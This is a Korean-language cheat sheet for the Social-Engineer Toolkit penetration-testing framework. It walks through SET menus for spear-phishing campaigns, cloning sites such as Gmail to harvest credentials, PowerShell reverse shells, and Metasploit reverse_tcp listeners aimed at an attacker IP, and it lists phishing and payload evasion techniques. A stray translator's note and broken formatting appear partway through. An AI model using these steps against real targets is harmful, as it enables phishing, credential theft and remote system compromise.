소셜 엔지니어링 툴킷 (SET) 치트시트
소셜 엔지니어링 툴킷(SET)은 소셜 엔지니어링 공격을 위해 설계된 오픈 소스 침투 테스트 프레임워크입니다. David Kennedy (ReL1K)와 TrustedSec 팀에 의해 개발된 SET는 여러 소셜 엔지니어링 공격을 자동화하고 보안 평가에서 인간의 취약성을 테스트하기 위한 포괄적인 플랫폼을 제공합니다.
설치 및 설정
Kali Linux에 설치
# SET comes pre-installed on Kali Linux
setoolkit
# Update SET
cd /opt/set
git pull수동 설치
# Clone repository
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/
# Install dependencies
pip3 install -r requirements.txt
# Run setup
python setup.py install
# Launch SET
python setoolkit구성
# Edit configuration file
nano /etc/setoolkit/set.config
# Key configuration options:
# WEBATTACK_EMAIL=ON
# APACHE_SERVER=ON
# METASPLOIT_PATH=/usr/share/metasploit-framework
# SENDMAIL=ON
# EMAIL_PROVIDER=GMAIL메인 메뉴 옵션
1) 소셜 엔지니어링 공격
# Launch SET
setoolkit
# Select option 1 from main menu
# Social-Engineering Attacks submenu:
# 1) Spear-Phishing Attack Vectors
# 2) Website Attack Vectors
# 3) Infectious Media Generator
# 4) Create a Payload and Listener
# 5) Mass Mailer Attack
# 6) Arduino-Based Attack Vector
# 7) Wireless Access Point Attack Vector
# 8) QRCode Generator Attack Vector
# 9) Powershell Attack Vectors
# 10) Third Party Modules스피어 피싱 공격 벡터
# Option 1 from Social-Engineering Attacks
# Spear-Phishing submenu:
# 1) Perform a Mass Email Attack
# 2) Create a FileFormat Payload
# 3) Create a Social-Engineering Template
# Mass Email Attack
# - Configure SMTP settings
# - Import email list
# - Create or select email template
# - Attach malicious payload
# FileFormat Payload
# - Select file format (PDF, DOC, XLS, etc.)
# - Choose exploit
# - Generate malicious file
# Email Templates
# - Pre-built templates for common scenarios
# - Custom template creation
# - HTML email support웹사이트 공격 벡터
# Option 2 from Social-Engineering Attacks
# Website Attack submenu:
# 1) Java Applet Attack Method
# 2) Metasploit Browser Exploit Method
# 3) Credential Harvester Attack Method
# 4) Tabnabbing Attack Method
# 5) Web Jacking Attack Method
# 6) Multi-Attack Web Method
# 7) HTA Attack Method
# Credential Harvester
# - Clone legitimate websites
# - Capture credentials
# - Redirect after capture
# - Email harvested credentials
# Java Applet Attack
# - Self-signed Java applet
# - Social engineering prompt
# - Payload execution after acceptance
# Browser Exploit Method
# - Metasploit browser exploits
# - Automatic exploitation
# - Multiple exploit attempts공격 시나리오
자격 증명 수집
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 3) Credential Harvester Attack Method
# Harvester options:
# 1) Web Templates
# 2) Site Cloner
# 3) Custom Import
# Site Cloner example:
# Enter URL to clone: https://gmail.com
# SET will clone the site and host locally
# Captured credentials saved to /root/.set/reports/피싱 이메일 캠페인
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 1) Spear-Phishing Attack Vectors
# Select: 1) Perform a Mass Email Attack
# Configuration steps:
# 1) Select attack vector (fileformat, etc.)
# 2) Configure payload
# 3) Setup email template
# 4) Configure SMTP settings
# 5) Import target email list
# 6) Send campaign
# Email list format (emails.txt):
# user1@company.com
# user2@company.com
# user3@company.com감염성 미디어 생성기
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 3) Infectious Media Generator
# Media options:
# 1) File-Format Exploits
# 2) Standard Metasploit Executable
# File-Format Exploits:
# - PDF exploits
# - Microsoft Office exploits
# - Browser-based exploits
# Standard Executable:
# - Windows executable
# - Linux executable
# - Mac OSX executablePowerShell 공격 벡터
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 9) Powershell Attack Vectors
# PowerShell options:
# 1) PowerShell Alphanumeric Shellcode Injector
# 2) PowerShell Reverse Shell
# 3) PowerShell Bind Shell
# 4) PowerShell Dump SAM Database
# Reverse Shell example:
# Enter IP address for reverse connection
# Enter port for reverse connection
# Generate PowerShell command
# Execute on target system고급 기술
맞춤 페이로드
# Create custom payload
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 4) Create a Payload and Listener
# Payload options:
# 1) Windows Shell Reverse_TCP
# 2) Windows Meterpreter Reverse_TCP
# 3) Windows Meterpreter Reverse_HTTP
# 4) Windows Meterpreter Reverse_HTTPS
# 5) Linux Shell Reverse_TCP
# Configuration:
# Set LHOST (attacker IP)
# Set LPORT (listening port)
# Generate payload
# Setup listener다중 공격 웹 방법
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 2) Website Attack Vectors
# Select: 6) Multi-Attack Web Method
# Combines multiple attack vectors:
# - Java Applet Attack
# - Metasploit Browser Exploit
# - Credential Harvester
# - Tabnabbing
# - Web Jacking
# Increases success probability
# Automatic fallback methods
# Comprehensive attack coverageArduino 기반 공격
# Start SET
setoolkit
# Select: 1) Social-Engineering Attacks
# Select: 6) Arduino-Based Attack Vector
# Arduino attack types:
# 1) Powershell HTTP GET MSF Payload
# 2) WSCRIPT HTTP GET MSF Payload
# 3) Powershell HTTP POST MSF Payload
# 4) WSCRIPT HTTP POST MSF Payload
# 5) Download-Execute Powershell Attack
# 6) Download-Execute WSCRIPT Attack
# Generates Arduino sketch
# Physical access required
# Automated payload execution
# Bypasses software restrictionsMetasploit과 통합
Metasploit 통합 설정
# Configure Metasploit path in SET
nano /etc/setoolkit/set.config
# Set Metasploit path:
METASPLOIT_PATH=/usr/share/metasploit-framework
# Start Metasploit listener
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST attacker_ip
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j자동 리스너 설정
# SET can automatically setup Metasploit listeners
# When creating payloads, select:
# "Do you want to start the listener now? [y/n]:"
# Select 'y' for automatic listener setup
# SET will:
# 1) Generate appropriate payload
# 2) Start msfconsole
# 3) Configure handler
# 4) Start listener보고 및 로깅
자격 증명 보고서
# Harvested credentials location
/root/.set/reports/
# View captured credentials
cat /root/.set/reports/2024-01-01\ 12:00:00.txt
# Email reports (if configured)
# Automatic email notifications
# Real-time credential capture alerts공격 로그
# SET log files
/root/.set/logs/
# View attack logs
tail -f /root/.set/logs/set_logfile.log
# Apache access logs (for web attacks)
tail -f /var/log/apache2/access.log
# Email logs
tail -f /var/log/mail.log맞춤 보고
# Generate custom reports
# Parse log files for specific information
grep "credential" /root/.set/logs/set_logfile.log
# Extract IP addresses
grep -oE "\b([0-9]\\\\{1,3\\\\}\.)\\\\{3\\\\}[0-9]\\\\{1,3\\\\}\b" /root/.set/logs/set_logfile.log
# Count successful attacks
grep -c "successful" /root/.set/logs/set_logfile.log회피 기술
이메일 회피
The translations maintain the original markdown formatting, keep technical terms in English, and preserve the structure and punctuation of the original text.```bash
Domain reputation management
Use legitimate email providers
Gradual sending patterns
Personalized content
Email headers manipulation
SPF/DKIM configuration
Reply-to address spoofing
Message threading
Content evasion
Image-based content
URL shorteners
Legitimate file hosting
```bash
# Domain fronting
# CDN utilization
# SSL/TLS encryption
# Legitimate hosting providers
# User-Agent rotation
# IP address rotation
# Traffic timing variation
# Legitimate referrer headers
# Content delivery
# Staged payloads
# Encrypted communications
# Legitimate file formats
```### 페이로드 회피
```bash
# Encoding techniques
# Encryption methods
# Packing/compression
# Code obfuscation
# Delivery methods
# Legitimate file formats
# Trusted applications
# Signed executables
# Execution techniques
# Living off the land
# PowerShell alternatives
# Memory-only execution
```## 모범 사례
### 법적 및 윤리적 고려사항
```bash
# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Create engagement documentation
echo "Social Engineering Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: Email addresses, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt
```### 운영 보안
```bash
# Use dedicated infrastructure
# Implement proper logging
# Secure communication channels
# Regular backup procedures
# Infrastructure isolation
# Separate testing networks
# Dedicated email accounts
# Isolated web servers
# Data protection
# Encrypted storage
# Secure transmission
# Proper disposal
```### 테스트 방법론
```bash
# Reconnaissance phase
# Target identification
# Information gathering
# Attack vector selection
# Execution phase
# Payload delivery
# Credential harvesting
# System compromise
# Post-exploitation
# Persistence establishment
# Data collection
# Evidence gathering
# Reporting phase
# Impact assessment
# Remediation recommendations
# Executive summary
```## 문제 해결
### 일반적인 문제
```bash
# Email delivery problems
# Check SMTP configuration
# Verify DNS settings
# Test email connectivity
# Web server issues
# Check Apache configuration
# Verify port availability
# Test web connectivity
# Payload generation errors
# Verify Metasploit integration
# Check dependencies
# Update SET framework
# Permission issues
# Run as root user
# Check file permissions
# Verify directory access
```### 구성 수정
```bash
# Reset SET configuration
rm /etc/setoolkit/set.config
setoolkit # Will recreate config
# Update SET framework
cd /opt/set
git pull
python setup.py install
# Fix Apache issues
sudo systemctl restart apache2
sudo systemctl enable apache2
# Fix email issues
sudo systemctl restart postfix
sudo systemctl enable postfix
```## 리소스
- [SET 공식 문서](https://github.com/trustedsec/social-engineer-toolkit)
- [TrustedSec 블로그](https://www.trustedsec.com/blog/)
- [소셜 엔지니어링 프레임워크](https://www.social-engineer.org/)
- [NIST 사이버 보안 프레임워크](https://www.nist.gov/cyberframework)
- [SANS 소셜 엔지니어링](https://www.sans.org/white-papers/social-engineering/)